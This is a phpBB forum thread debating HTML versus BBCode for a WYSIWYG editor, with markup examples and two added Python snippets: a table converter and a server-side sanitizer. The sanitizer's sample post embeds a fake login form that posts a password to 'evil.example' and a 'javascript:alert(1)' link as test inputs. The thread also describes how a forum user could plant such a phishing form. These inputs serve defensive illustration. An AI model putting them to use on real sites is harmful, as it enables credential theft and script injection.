[RFC] WYSIWYG editor
Re: [RFC] WYSIWYG editor
http://htmlpurifier.org/ is, I believe, the most secure HTML parser yet. I'm not sure, but I'm not in favour of HTML - as said, it's not guaranteed secure: as the specification changes, new things may be introduced, or workarounds for the current exploits. Furthermore, it's more about what a user can do - would you want any user to be able to replicate a page, fake it for example? Some forums may want certain form elements on their pages, however a smart user may put in the HTML "Please login again to download file <username> <password> <submit>" - provided it fits in with the rest of the page, how many would fall for this? Many, imo.
Removing any attributes wouldn't help; there are effects which can only be achieved by setting a class, for example, or spoiler BBCode - how will one replicate that with HTML? They can't; they still need something to parse that code properly, and fitting it in with a WYSIWYG editor wouldn't work. Let's say you were to call it '<spoiler>xyz</spoiler>' - the editor must be modified to deal with this. Yes, this is a problem with BBCode too, but it's more problematic with HTML.
On a forum where you want hundreds of types of content to be displayed, how will this work? Such as YouTube videos - you will have to go to the effort of hardcoding this somewhat.
Look at vBulletin: they have a WYSIWYG editor and allow the posting of HTML, however BBCode is superior. The latter (HTML) is almost always disabled for security, and because compared to BBCode it has not much of a use (see above).
EDIT
Rotsblok, if only it was that simple - Look at the code of HTMLPurifier, I believe it is well commented - this will let you know of the complexity.
EDIT2
BBCode also allows for more powerful features, such as processing it in PHP (let's say you want a random number seed for whatever reason) - this can be done without reinventing the wheel by making a BBCode parser, if a powerful one already exists.
Re: [RFC] WYSIWYG editor
Nelsaidi wrote:
EDIT
Rotsblok, if only it was that simple - Look at the code of HTMLPurifier, I believe it is well commented - this will let you know of the complexity.
Everything looks complex to me..
Highway of Life wrote:
No, I’m not trying to make an HTML parser or discussing the usefulness of such a parser with those rules, I’m specifically addressing the question of whether a “Secure” HTML parser exists - Kellanved said that such a parser doesn’t exist, so I’m curious, based on the rules I stated above, how you would exploit such an HTML parser.
Ah okay .. was just finding out what you meant with attributes..
BTW just a thought... perhaps some additional easy-to-use parser functions.. something like the ability to predefine (through ACP or other) formats for things that are more complex but easier to type.
Like, say I want to put a table in a post.. but adding things like [table][tr][td]bla[/td][td]etc...[/td][/tr][/table] is somewhat over-typing.. maybe a thing where when you put in [table]bla|etc..[/table] it will make the table.. (although this can be done already, methinks..) but with more complex structures..
I know MediaWiki has a thing called templates, that will put things in a certain defined layout when you put things in like {{position 1|position 2}} in a table or anything you want...
If you can do that you can then also make logical "scripts" like: if position 1 is true then fill position 2 in at this place, else ignore...
(hope I make some sense..)
Re: [RFC] WYSIWYG editor
Wiki's markup for tables is something like this...
Code:
{|
|-
! header name
! Another header
|-
| cell content first row
| another cell
|-
| cell content second row
| another cell
|-
|}
Less typing is always nice.
And with such markup, you could still have a BBCode parser along with another parser, perhaps one that would do stuff like this:
Code:
*bold*
_italic_
h1. Header 1
h2. Header 2
h3. Header 3
bq. Block Quotes
Footnotes[1]
fn1. Footnotes are great to use as anchors
??cite your author?? (<cite></cite>)
Insert @some code@ (<code></code>)
remove -some text- from a sentence. (<del></del>)
insert +some text+ in a sentence. (<ins></ins>)
~subscript~
^superscript^
* bullet lists
# numeric lists
#* nested lists
See if you recognize where that markup is from.
You can also take it a step further with classes...
Code:
p(className). Paragraph with a CSS class name
p(#super-duper). Paragraph with a CSS id
Or alignments...
Code:
p<. align left
p>. align right
p=. align center
p<>. justified
p(. Left indent 1em
p))). Right indent 3em
p((((. Left indent 4em
Tables are done like so...
Code:
|_. Name |_. Species |_. Gender |
| Ranger | Horse | Male |
| Frosty | Cat | Male |
| Mindy | Horse | Female |
| Peaches | Dog | Female |
There's a lot more to it than that, but it’s a good small sample. What I like about using that kind of markup is that you could use it with the BBCode parser without conflict, it’s lighter than the (current) BBCode parser, and it has a lot of functionality with very little markup to text, compared to BBCode, which is a lot of markup to text.
Textile Markup
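An added example, not code from the post, from phpBB or from MediaWiki: a small converter for the `{| |- ! | |}` table syntax quoted above. Every cell is HTML-escaped before it is wrapped in `<th>`/`<td>`, so a cell containing raw HTML such as a `<form>` is displayed literally rather than rendered; `SAMPLE` is the post's table, constructed inline.

```python
import html

# Constructed sample: the wiki table markup quoted in the post above.
SAMPLE = """{|
|-
! header name
! Another header
|-
| cell content first row
| another cell
|-
| cell content second row
| another cell
|-
|}"""


def wiki_table_to_html(markup: str) -> str:
    """Convert the {| |- ! | |} table syntax to an HTML <table>.

    '!' lines become header cells, '|' lines become data cells and '|-'
    starts a new row.  Cell text is escaped with html.escape, so markup
    typed inside a cell can never reach the browser as live HTML.
    """
    rows, current = [], []
    for line in markup.splitlines():
        line = line.strip()
        if line in ("{|", "|}"):          # table open / close markers
            continue
        if line == "|-":                  # row separator
            if current:
                rows.append(current)
            current = []
        elif line.startswith("!"):
            current.append(("th", line[1:].strip()))
        elif line.startswith("|"):
            current.append(("td", line[1:].strip()))
        else:
            raise ValueError(f"unexpected table line: {line!r}")
    if current:                            # table closed without a final |-
        rows.append(current)

    out = ["<table>"]
    for row in rows:
        cells = "".join(f"<{tag}>{html.escape(text)}</{tag}>" for tag, text in row)
        out.append(f"<tr>{cells}</tr>")
    out.append("</table>")
    return "\n".join(out)
```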
Re: [RFC] WYSIWYG editor
I think we're getting terribly offtopic, I’ll open a new RFC with markup options.
Re: [RFC] WYSIWYG editor
I was under the impression that WYSIWYG editors like TinyMCE address these very issues and the security built in is more than sufficient.
Re: [RFC] WYSIWYG editor
bobtheman wrote:
I was under the impression that WYSIWYG editors like TinyMCE address these very issues and the security built in is more than sufficient.
Errr, Javascript is client side - it is very easily modifiable, and what if the user doesn't have Javascript enabled? The fallback is to use a standard text editor and they can insert anything.
All security checking etc. must be done server side.
Addressing issues such as markup, well, see the topic HOL has/will create.
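An added example (not code from this thread or from phpBB) of the server-side approach argued for in this reply and in Nelsaidi's first post: raw HTML in a post is escaped wholesale, and only a whitelist of BBCode is translated into fixed HTML, so the fake login form survives only as visible text, `[spoiler]` gets its class from the parser rather than from the user, and `[url]` accepts only http(s). The tag set, class name and `SAMPLE_POST` are assumptions constructed for the example.

```python
import html
import re
from typing import Optional
from urllib.parse import urlparse

# Constructed sample post: legitimate BBCode, the kind of fake login form
# described earlier in the thread, and a [url] with a non-http scheme.
SAMPLE_POST = (
    "[b]Download[/b] here: [url=http://example.com/file]file[/url]\n"
    "Please login again <form action='http://evil.example'><input name='password'></form>\n"
    "[spoiler]hidden text[/spoiler] [url=javascript:alert(1)]click[/url]"
)

SIMPLE_TAGS = {"b": "strong", "i": "em"}   # whitelisted BBCode -> fixed HTML element


def safe_url(raw: str) -> Optional[str]:
    """Accept only absolute http(s) URLs; javascript:, data: and relative URLs are rejected."""
    parts = urlparse(raw)
    if parts.scheme in ("http", "https") and parts.netloc:
        return html.escape(raw, quote=True)
    return None


def render_bbcode(text: str) -> str:
    """Server-side render: escape ALL raw HTML first, then translate only whitelisted
    BBCode into fixed HTML. No user-supplied tag or attribute ever reaches the output."""
    out = html.escape(text, quote=True)            # <form ...> becomes literal text
    for bb, tag in SIMPLE_TAGS.items():
        out = re.sub(rf"\[{bb}\](.*?)\[/{bb}\]", rf"<{tag}>\1</{tag}>", out, flags=re.S)
    # [spoiler] maps to a class chosen by the parser: the effect the thread notes
    # cannot be reproduced by user HTML once its attributes are stripped.
    out = re.sub(r"\[spoiler\](.*?)\[/spoiler\]", r'<span class="spoiler">\1</span>', out, flags=re.S)

    def link(m):
        href = safe_url(html.unescape(m.group(1)))
        # Rejected URL: leave the BBCode visible as plain text instead of emitting a link.
        return f'<a href="{href}">{m.group(2)}</a>' if href else m.group(0)

    return re.sub(r"\[url=([^\]]+)\](.*?)\[/url\]", link, out, flags=re.S)
```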
Re: [RFC] WYSIWYG editor
Hi there,
I have been developing a kind of private phpBB WYSIWYG for over a year now, and I think I'm a genius in some things.
But, nevermind/anyway: here are the main points, and here* is where I got stuck,
but it's not impossible: I know that for sure.
- Minimum: support of main BBCodes
- *Auto-integration of any custom BBCode
- Perfect working in all possibilities
- Near sec-safe architecture
- Using as much as possible of phpBB core code to parse and pre-filter the display of problem content (as in Live Preview)
- Lightweight and clean (uncompressed) code
- Switchable by user to "old mode"
- Min. load time
Re: [RFC] WYSIWYG editor
4seven wrote:
Hi there,
I have been developing a kind of private phpBB WYSIWYG for over a year now, and I think I'm a genius in some things.
But, nevermind/anyway: here are the main points, and here* is where I got stuck,
but it's not impossible: I know that for sure.
- Minimum: support of main BBCodes
- *Auto-integration of any custom BBCode
- Perfect working in all possibilities
- Near sec-safe architecture
- Using as much as possible of phpBB core code to parse and pre-filter the display of problem content (as in Live Preview)
- Lightweight and clean (uncompressed) code
- Switchable by user to "old mode"
- Min. load time
Got any code we can see?
Re: [RFC] WYSIWYG editor
I'll wait to make it publicly(!) viewable until the syntax of 3.1 is clear.